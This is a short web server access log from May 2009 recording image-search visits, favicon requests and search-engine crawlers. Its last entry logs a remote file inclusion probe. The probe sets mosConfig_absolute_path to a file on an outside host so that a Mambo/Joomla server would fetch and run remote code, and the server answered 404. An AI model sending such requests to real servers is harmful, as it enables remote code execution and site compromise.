84.108.17.206 - - [19/May/2009:18:07:14 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.co.il/imgres?imgurl=http://www.decodeine.com/o4.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__t8F0GV2uVKJcEoCOy3ymDjRFJu0=&h=219&w=698&sz=34&hl=iw&start=72&um=1&tbnid=j1K9D3ZJsun3_M:&tbnh=44&tbnw=139&prev=/images%3Fq%3Deploded%2Baxonometric%2Bzaha%2Bhadid%26ndsp%3D18%26hl%3Diw%26sa%3DN%26start%3D54%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 930 6377280
84.108.17.206 - - [19/May/2009:18:08:43 +0100] "GET /o4.jpg HTTP/1.1" 200 34271 "http://images.google.co.il/imgres?imgurl=http://www.decodeine.com/o4.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__t8F0GV2uVKJcEoCOy3ymDjRFJu0=&h=219&w=698&sz=34&hl=iw&start=72&um=1&tbnid=j1K9D3ZJsun3_M:&tbnh=44&tbnw=139&prev=/images%3Fq%3Deploded%2Baxonometric%2Bzaha%2Bhadid%26ndsp%3D18%26hl%3Diw%26sa%3DN%26start%3D54%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 927 34633
84.108.17.206 - - [19/May/2009:18:08:48 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 298 641
84.108.17.206 - - [19/May/2009:18:08:49 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (compatible; Google Desktop)" 168 642
74.6.17.154 - - [19/May/2009:18:43:53 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [19/May/2009:18:43:54 +0100] "GET / HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 457 216
216.129.119.14 - - [19/May/2009:21:26:01 +0100] "GET /log/ HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 193 3418
194.160.239.135 - - [19/May/2009:21:46:29 +0100] "GET /log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 345 606
